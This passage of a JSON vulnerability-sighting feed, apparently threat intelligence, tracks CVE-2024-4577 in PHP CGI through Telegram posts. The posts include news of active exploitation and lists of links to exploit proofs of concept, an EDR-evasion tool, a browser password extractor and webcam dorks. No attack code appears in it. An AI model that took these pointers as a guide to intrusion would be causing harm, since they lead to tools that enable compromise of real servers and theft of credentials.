Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-09-02T21:35:26.000000Z"}, {"uuid": "c8ff9f47-2209-4ae6-8c2e-ee6d914a42c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/MMti5ekOm8iRHFz8oTLZ-uu0dUK2FP2Qemi9wij1vY0PCGy6", "content": "", "creation_timestamp": "2024-12-19T15:52:50.000000Z"}, {"uuid": "c11b0074-a346-44e8-be13-c46bd6f89bb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/-cv6wo8ouTDfXNPjFcqSTlo47L_hWCX8P1hwawfPRL5GrzQ", "content": "", "creation_timestamp": "2024-06-12T05:17:47.000000Z"}, {"uuid": "36ca355f-d8de-4674-a83f-9a779554d6e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/9Z2zzmuQjdkZ7H-k-FhNpQUTyh1rf5hK07koeIaZkjgoUcw", "content": "", "creation_timestamp": "2024-09-03T19:50:56.000000Z"}, {"uuid": "4e1d2976-106f-443e-a9f1-36073eeb0cac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/6asQ3ZoyMzPr01_ZfMetCzJfTKnI0gH1O6vo6C2eYfi3BRc", "content": "", "creation_timestamp": "2024-06-20T09:49:08.000000Z"}, {"uuid": "e299f278-aacb-436e-b347-d829c289c3d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/9ZsYTXsKSKnKZgnN3AQtYD7a0fqgKEU67Th9Y8o_UllrlDQ", "content": "", "creation_timestamp": "2024-09-03T19:50:58.000000Z"}, {"uuid": "7df40add-b982-4b38-9838-4277dd901f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/hackmania_channel/2339", "content": "New PHP vulnerability CVE-2024-4577 puts Windows servers at risk of remote code execution\n\nhttps://github.com/ZephrFish/CVE-2024-4577-PHP-RCE/tree/main", "creation_timestamp": "2024-06-20T09:52:18.000000Z"}, {"uuid": "e8269226-4265-4939-b189-5c33db489eed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/hackmania_channel/389", "content": "New PHP vulnerability CVE-2024-4577 puts Windows servers at risk of remote code execution\n\nhttps://github.com/ZephrFish/CVE-2024-4577-PHP-RCE/tree/main", "creation_timestamp": "2024-06-12T05:17:47.000000Z"}, {"uuid": "71451c1f-b1ba-4fda-9272-52f5679dc650", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/naIyIZnQQNiWlwkAjuDQ7Y-RS5OhAy8K9qJM--pGSb7ksBvY", "content": "", "creation_timestamp": "2024-11-16T16:26:08.000000Z"}, {"uuid": "6fe80c0b-e76d-49ff-a84e-0a1f536210ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/3g1e-4aDFokr80DdGSGluc46ppq56rmY8GDFKz1KtDaQNyL-", "content": "", "creation_timestamp": "2024-11-17T08:08:15.000000Z"}, {"uuid": "8d021392-fbce-4139-9e47-4237064a6a3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/6jCtY2t5i1faZV-LQiu5UtBYditHmddalF3h5uBVrfpXXLI", "content": "", "creation_timestamp": "2024-06-20T09:49:09.000000Z"}, {"uuid": "cd2da21d-2144-4399-8d20-c19d51200573", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/vKbw2QyzFe3-5A4-yt5rCCtpHOw1pswjn6Ar5omLqXARVL8", "content": "", "creation_timestamp": "2024-06-12T05:17:47.000000Z"}, {"uuid": "028f34f5-8ca1-4380-ba98-90b9f07b081c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/AGENTZSECURITY/1253", "content": "https://github.com/toramanemre/log4j-rce-detect-waf-bypass\nhttps://github.com/trickest/log4j\nhttps://github.com/twseptian/custom-nuclei-templates\nhttps://github.com/umityn/my-nuclei-templates\nhttps://github.com/v3l4r10/Nuclei-Templates\nhttps://github.com/valaDevs/env-js-nuclei\nhttps://github.com/valaDevs/nuclei-backupfile-finder\nhttps://github.com/vidocsecurity/templates\nhttps://github.com/vishal12300/all_nuclei_templatess\nhttps://github.com/vsh00t/nuclei-templates\nhttps://github.com/vulnspace/nuclei-templates\nhttps://github.com/wasp76b/nuclei-templates\nhttps://github.com/wearetyomsmnv/llm_integrated_nuclei_templates\nhttps://github.com/websecresearch/nucleirecordloginsession\nhttps://github.com/windyGarlic/my-nuclei-templates\nhttps://github.com/windyGarlic/nuclei-templates\nhttps://github.com/wr00t/templates\nhttps://github.com/xelemental/Nuclei-Templates\nhttps://github.com/xinZa1/template\nhttps://github.com/xjhonly/nuclei-templates\nhttps://github.com/yarovit-developer/nuclei-templates\nhttps://github.com/yavolo/nuclei-templates\nhttps://github.com/z3bd/nuclei-templates\nhttps://github.com/zer0yu/Open-PoC\nhttps://github.com/zinminphyo0/KozinTemplates\nhttps://github.com/zodmagus/z0ds3c-Nuclei-Templates\nhttps://github.com/Christbowel/CVE-2024-25600_Nuclei-Template\nhttps://github.com/0xr2r/templates-nucleir2r\nhttps://github.com/al00000000al/my_nuclei_templates\nhttps://github.com/JohnDoeAnonITA/NucleiTemplatePRV\nhttps://github.com/emo-crab/scap-rs\nhttps://github.com/blackvitasoy/nuclei_templates\nhttps://github.com/BattalFaikAktas/custom-nuclei-templates\nhttps://github.com/0xc4sper0/Nuclei-templates\nhttps://github.com/abletsoff/custom-nuclei-templates\nhttps://github.com/rzizah/private-nuclei-template\nhttps://github.com/0xPugal/my-nuclei-templates\nhttps://github.com/jhonnybonny/nuclei-templates-bitrix\nhttps://github.com/Anja-dhnd/templates4nuclei\nhttps://github.com/andersonmv/Nuclei_Templates\nhttps://github.com/pushpak-11/nuclei-templates\nhttps://github.com/chudamax/custom_nuclei_templates\nhttps://github.com/emadshanab/nuclei-bitrix-templates\nhttps://github.com/Sachinart/manual-nuclei-templates\nhttps://github.com/exploit-io/nuclei-fuzz-templates\nhttps://github.com/hackersupcoming/Nuclei_Templates\nhttps://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561\nhttps://github.com/niranc/Nuclei-personal-templates\nhttps://github.com/Loftven/BIZONE_WAF_DETECt\nhttps://github.com/YashVardhanTrip/nuclei-templates-initial-access\nhttps://github.com/Saitle/Yamilicious\nhttps://github.com/SalehLardhi/nuclei-wp-config-php\nhttps://github.com/c3rrberu5/CVE-2024-24919\nhttps://github.com/0x20c/CVE-2024-4577-nuclei\nhttps://github.com/xungzzz/CVE-2024-4956\nhttps://github.com/ZephrFish/CVE-2024-4577-PHP-RCE\nhttps://github.com/Term1N8/nuclei-templates\nhttps://github.com/KhukuriRimal/CustomNucleiTemplates\nhttps://github.com/stuxctf/nuclei-templates-stux\nhttps://github.com/megamindmeg/Templates\nhttps://github.com/TolgaTD/Nuclei-Custom-Templates\nhttps://github.com/adibarsyad/nuclei-ios\nhttps://github.com/Sysc4ll3r/CVE-2024-4577\nhttps://github.com/adibarsyad/nuclei-jsp-source-code-review\nhttps://github.com/edoardottt/RFDos-Scanner\nhttps://github.com/banditzCyber0x/template\nhttps://github.com/sardine-web/polaris-web-reflected-xss.git\nhttps://github.com/Josekutty-K/nuclei-templates\nhttps://github.com/Mamilate/3-Nuclei-Templates\nhttps://github.com/ReksySec/3Nucleit-Templates\nhttps://github.com/Mohsenalmamun/Nuclei-Template\nhttps://github.com/K3ysTr0K3R/Custom-Nuclei-Templates\nhttps://github.com/br0wnst4n11/Custom_Nuclei_Templates\nhttps://github.com/juanschallibaum/CVE-2024-38473-Nuclei-Template\nhttps://github.com/fa-rrel/Nuclei-templates-xd \nhttps://github.com/superhexa/nuclei-templates\nhttps://github.com/ts4rin4/templates4nuclei\nhttps://github.com/jhonnybonny/nuclei-templates", "creation_timestamp": "2025-04-22T02:52:22.000000Z"}, {"uuid": "8d2204eb-4eed-4983-a2cf-913eb4fab06c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/-XLltWBWWKJzWC7J4O7_M8Sd8NulSTZYrzRBkIu2gm7qWUIU", "content": "", "creation_timestamp": "2025-01-18T20:31:40.000000Z"}, {"uuid": "5ce4b385-02f7-4b48-91e4-2aab73c38c16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/oQeMKo9J8ylqnPWcFl29vZ4qbGoGjIBk9ToKSA6Caqu2zWnp", "content": "", "creation_timestamp": "2024-12-19T15:52:51.000000Z"}, {"uuid": "aaa11393-d1e9-4c6f-b9e5-132c81548bae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/LockBitRaasRansomware/35772", "content": "New PHP vulnerability CVE-2024-4577 puts Windows servers at risk of remote code execution\n\nhttps://github.com/ZephrFish/CVE-2024-4577-PHP-RCE/tree/main", "creation_timestamp": "2024-06-12T05:17:48.000000Z"}, {"uuid": "1dc67d40-c428-4eee-ab12-9d9c1423691d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "Telegram/dnSysZKFIz2-BSly9SocYBuPRUqEh_zTDQw5Y5yACwgaqg", "content": "", "creation_timestamp": "2025-03-19T22:16:52.000000Z"}, {"uuid": "f6d8c191-5d18-4e75-bbbe-71b729544790", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "Telegram/TnTGlc1AMdV-Eo0Q5YPKm7NAqv_p6qHwo9I-9kInp-coag", "content": "", "creation_timestamp": "2025-03-07T07:24:36.000000Z"}, {"uuid": "74bea115-cbc5-4df1-a5c4-93cabaa757aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "Telegram/g6vb2L73NwXa9_io_oTRhLuop413WpQ8wITtZ1UH4BncxA", "content": "", "creation_timestamp": "2024-07-11T08:13:48.000000Z"}, {"uuid": "44c6d07e-1d70-4302-a0cc-b66d26ed474e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/XpvaFCWqDdhczMpL78DIu7UwbRt1BfqFLpK3OfazzKgSSlAyeg", "content": "", "creation_timestamp": "2024-08-31T12:29:12.000000Z"}, {"uuid": "60e997c2-749a-4697-b626-8fd8f5e64e1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/AnonymousEgypt/22211", "content": "New PHP vulnerability CVE-2024-4577 puts Windows servers at risk of remote code execution\n\nhttps://github.com/ZephrFish/CVE-2024-4577-PHP-RCE/tree/main", "creation_timestamp": "2024-09-03T19:50:41.000000Z"}, {"uuid": "cd7b06e0-f0f1-4baf-a437-e87e611e4dc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "Telegram/XAaTnmINUoUT-ZVc6TeYr6ZozY949hzIRjv-V7fqX2zxsg", "content": "", "creation_timestamp": "2024-06-08T13:22:21.000000Z"}, {"uuid": "4867f11a-0c98-47b6-a2e6-bff2c3c8910d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/LockBitRaasRansomware/37946", "content": "New PHP vulnerability CVE-2024-4577 puts Windows servers at risk of remote code execution\n\nhttps://github.com/ZephrFish/CVE-2024-4577-PHP-RCE/tree/main", "creation_timestamp": "2024-06-20T09:49:16.000000Z"}, {"uuid": "c1c019f2-4b12-4993-9b10-1de75e269d2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/lostsec/606", "content": "testing latest trending PHP CGI Argument Injection vulnerability (CVE-2024-4577) to obtain RCE on a vulnerable PHP version running in a Windows environment", "creation_timestamp": "2024-06-08T06:54:13.000000Z"}, {"uuid": "a2428259-3223-48bc-bd61-4a5e45a3476b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "Telegram/ftfjF_hXbamTdpXH3LuMTQN4T0KMYcktX0mMniSCN5xkr6Y", "content": "", "creation_timestamp": "2024-06-07T12:30:58.000000Z"}, {"uuid": "4a94ac4a-7df4-4640-9267-1e72688134b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/6RXWCqRmYSaFjOCU3giKkeGcnzdC5kvm1fhzrZcsNfEOUWk", "content": "", "creation_timestamp": "2024-08-06T23:48:46.000000Z"}, {"uuid": "b7e52944-4500-4fd7-8942-8b2478f5bc76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/jyNeIb1yoxZzx51ZeJbeArUgQx9HUmqGEHj1s2fi23sRm9I", "content": "", "creation_timestamp": "2024-07-31T23:20:39.000000Z"}, {"uuid": "5d437d99-cc51-4cac-9897-9942551819e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/207", "content": "Tools - Hackers Factory\n\nIndicators of Compromises (IOC) of our various investigations \n\nhttps://github.com/eset/malware-ioc\n\nCommunity edition nuclei templates, a simple tool that allows you to organize all the Nuclei templates offered by the community in one place \n\nhttps://github.com/xm1k3/cent\n\nBOF implementations of CVE-2024-26229 for Cobalt Strike and BruteRatel \n\nhttps://github.com/NVISOsecurity/CVE-2024-26229-BOF\n\nGoogle & Shodan Dorks for web cameras search\n\nLarge list of\u00a0 search queries to find internet-connected webcams. Can be used in Google as well as various IP search engines (Shodan, Netlas, Censys etc).\n\nhttps://github.com/ExploitXpErtz/WebCam-Google-Shodan-Dorks\n\nFirefox Decrypt is a tool to extract passwords from Mozilla (Firefox\u2122, Waterfox\u2122, Thunderbird\u00ae, SeaMonkey\u00ae) profiles \n\nhttps://github.com/unode/firefox_decrypt\n\nThis repository contains a Nuclei template to detect the PHP CGI Argument Injection vulnerability identified as CVE-2024-4577.\n\nhttps://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template\n\nA technique that can be used to bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes (such as msfvenom) by performing on-the-fly decryption of individual encrypted assembly instructions, thus rendering memory scanners useless for that specific memory page. \n\nhttps://github.com/vxCrypt0r/Voidgate\n\nBug-Bounty-Methodology\n\nhttps://github.com/tuhin1729/Bug-Bounty-Methodology\n\nThis repository contains a collection of notes, write-ups, scripts and so much more!\n\nhttps://github.com/HolyBugx/HolyTips\n\nMulti-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud. \n\nhttps://github.com/initstring/cloud_enum\n\n#HackersFactory", "creation_timestamp": "2024-06-19T09:33:42.000000Z"}, {"uuid": "14fbf355-2970-4e33-9882-8efc91f84911", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/172", "content": "Tools - Hackers Factory\n\nSmbclient-ng, a fast and user friendly way to interact with SMB shares. \n\nhttps://github.com/p0dalirius/smbclient-ng\n\n5Ghoul - 5G NR Attacks & 5G OTA Fuzzing\n\nhttps://github.com/asset-group/5ghoul-5g-nr-attacks\n\nCVE-2024-4577 PHP CGI Argument Injection\n\nhttps://github.com/11whoami99/CVE-2024-4577/blob/88e8aa48f001d9538418783cb16179e5dfc59769/CVE-2024-4577.yaml\n\nA fuzzer for finding anomalies and analyzing how servers respond to different HTTP headers \n\nhttps://github.com/devanshbatham/headerpwn\n\nA small PoC demonstrating TLS interception on both HTTP1 and HTTP2\n\nhttps://github.com/Costinteo/hook-https\n\nPHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC \n\nhttps://github.com/watchtowrlabs/CVE-2024-4577\n\nA command line tool for extracting machine learning ready data from software binaries powered by Radare2 \n\nhttps://github.com/br0kej/bin2ml\n\nA collection of offensive Go packages inspired by different Go repositories.\n\nhttps://github.com/MrTuxx/OffensiveGolang\n\nHexVPN is a Python script that sets up a VPN connection using Riseup's VPN service. It fetches the necessary client certificates and VPN gateway configurations, measures latency to select the fastest gateway, and updates the configuration file accordingly. \n\nhttps://github.com/HexBuddy/HexVPN\n\n#HackersFactory", "creation_timestamp": "2024-06-17T14:11:01.000000Z"}, {"uuid": "b81cec1b-1ee4-49fd-a177-02ab53f01f52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/VC_wM-l992V-fizpTie-553oJzkDanyKErNYBo6M_Uocrig", "content": "", "creation_timestamp": "2024-06-07T14:12:49.000000Z"}, {"uuid": "54f51e94-7e2e-48e3-bd6b-c52cb452e8e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/2883", "content": "The Hacker News\nPHP Vulnerability Exploited to Spread Malware and Launch DDoS Attacks\n\nMultiple threat actors have been observed exploiting a recently disclosed security flaw in PHP to deliver remote access trojans, cryptocurrency miners, and distributed denial-of-service (DDoS) botnets.\nThe vulnerability in question is CVE-2024-4577 (CVSS score: 9.8), which allows an attacker to remotely execute malicious commands on Windows systems using Chinese and Japanese language locales. It", "creation_timestamp": "2024-07-11T08:08:23.000000Z"}, {"uuid": "4f319b89-0d46-4ca9-a27d-f29067ebe847", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/2224", "content": "The Hacker News\nNew PHP Vulnerability Exposes Windows Servers to Remote Code Execution\n\nDetails have emerged about a new critical security flaw impacting PHP that could be exploited to achieve remote code execution under certain circumstances.\nThe vulnerability, tracked as CVE-2024-4577, has been described as a CGI argument injection vulnerability affecting all versions of PHP installed on the Windows operating system.\nAccording to DEVCORE security researcher, the shortcoming makes", "creation_timestamp": "2024-06-08T12:33:48.000000Z"}, {"uuid": "81758d82-9276-45dd-be44-f756dd2ddd0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/JokerDPR/1226", "content": "\u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 PHP \u0438 Windows: \u0430\u043d\u0430\u043b\u0438\u0437 \u0430\u0442\u0430\u043a CVE-2024-4577 \u0438 ZDI-CAN-25373", "creation_timestamp": "2025-03-21T17:44:33.000000Z"}, {"uuid": "536a3680-6f5a-4eb2-923e-cc6d5fc53bdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/KomunitiSiber/2236", "content": "PHP Vulnerability Exploited to Spread Malware and Launch DDoS Attacks\nhttps://thehackernews.com/2024/07/php-vulnerability-exploited-to-spread.html\n\nMultiple threat actors have been observed exploiting a recently disclosed security flaw in PHP to deliver remote access trojans, cryptocurrency miners, and distributed denial-of-service (DDoS) botnets.\nThe vulnerability in question is CVE-2024-4577 (CVSS score: 9.8), which allows an attacker to remotely execute malicious commands on Windows systems using Chinese and Japanese language locales. It", "creation_timestamp": "2024-07-11T08:51:46.000000Z"}, {"uuid": "e0deaf13-23df-4f38-9755-eeadaaa9dd47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/KomunitiSiber/2079", "content": "New PHP Vulnerability Exposes Windows Servers to Remote Code Execution\nhttps://thehackernews.com/2024/06/new-php-vulnerability-exposes-windows.html\n\nDetails have emerged about a new critical security flaw impacting PHP that could be exploited to achieve remote code execution under certain circumstances.\nThe vulnerability, tracked as CVE-2024-4577, has been described as a CGI argument injection vulnerability affecting all versions of PHP installed on the Windows operating system.\nAccording to DEVCORE security researcher, the shortcoming makes", "creation_timestamp": "2024-06-08T10:03:12.000000Z"}, {"uuid": "ad41cb0c-b8ac-4af5-9cbc-d0d88ff9a445", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/1FU9JKkDtGpcne3Ep4nL0vHVyNGozrk1LcnkQn-O_2rRjKw", "content": "", "creation_timestamp": "2025-03-27T22:00:06.000000Z"}, {"uuid": "2219993a-322a-4a3a-be8e-d41abfa1e5a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/7MSLl2311Nuv4qp4Do9oaYjJEMDCbXIueq3AYYf2tmfpjN8", "content": "", "creation_timestamp": "2025-04-21T05:00:06.000000Z"}, {"uuid": "e07c2725-1829-4cae-8b13-fcaba394080d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/duOTfCn6RoqmHAqYRXt8t0kUEJcU31FUXRoVxVk6gm8XuvA", "content": "", "creation_timestamp": "2025-04-12T17:00:09.000000Z"}, {"uuid": "da3c8053-f9c2-4231-b766-b6c14fa27fc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/025r9Ac4mA6AzmYH4V_5jxzygPRuLIkjd6NMrYR-gf6fiv4", "content": "", "creation_timestamp": "2025-04-18T17:00:10.000000Z"}, {"uuid": "45cf2ed6-2947-46b5-b348-e68f34b8b117", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/O3NuM9Mq4SCXqBgDe5Z0H8KyVT7NeMwDEztuFj2IIEQAA90", "content": "", "creation_timestamp": "2025-05-12T11:00:06.000000Z"}, {"uuid": "d432ad28-7862-4ddc-8907-9ae5a6405c11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/R8EoyxEXRbLNSWTsyEt6N9qTL1rPI2Yd_uQ0MxwcMFQZ7gc", "content": "", "creation_timestamp": "2025-04-10T17:00:07.000000Z"}, {"uuid": "74ecc42c-8a6e-43c8-a86d-b3f5f7c119ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/UIIil_OEKPCpY2SMStXdCBJaH7xM-W5ZaJi2JXSjxGtvPOo", "content": "", "creation_timestamp": "2025-02-28T04:00:06.000000Z"}, {"uuid": "e1c62259-450b-48c7-9681-48b8fe6ce84f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/d8I0ltvk9IaNaRrUPAENTkkUIW2-c0rtciMu7LlTBN2ireI", "content": "", "creation_timestamp": "2025-03-15T16:00:09.000000Z"}, {"uuid": "43cf00ea-7614-4bb9-bb85-a82fa8a240e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/HJiZmnKNcNjBqR9hZRDulpBuoV2Et4KbICJZePkxxnGXcO0", "content": "", "creation_timestamp": "2025-02-14T16:00:08.000000Z"}, {"uuid": "33c766dc-1620-4bc3-b7e4-454b0a7e5d23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/w1bL0ZfQbZjC6kNLjY6qJg4sGK5mjn3UxkyFp-Fo5l10hpw", "content": "", "creation_timestamp": "2025-03-24T04:00:05.000000Z"}, {"uuid": "b3b5e810-1863-44d8-8c67-d170216db35d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7940", "content": "Tools - Hackers Factory\n\nSmbclient-ng, a fast and user friendly way to interact with SMB shares. \n\nhttps://github.com/p0dalirius/smbclient-ng\n\n5Ghoul - 5G NR Attacks & 5G OTA Fuzzing\n\nhttps://github.com/asset-group/5ghoul-5g-nr-attacks\n\nCVE-2024-4577 PHP CGI Argument 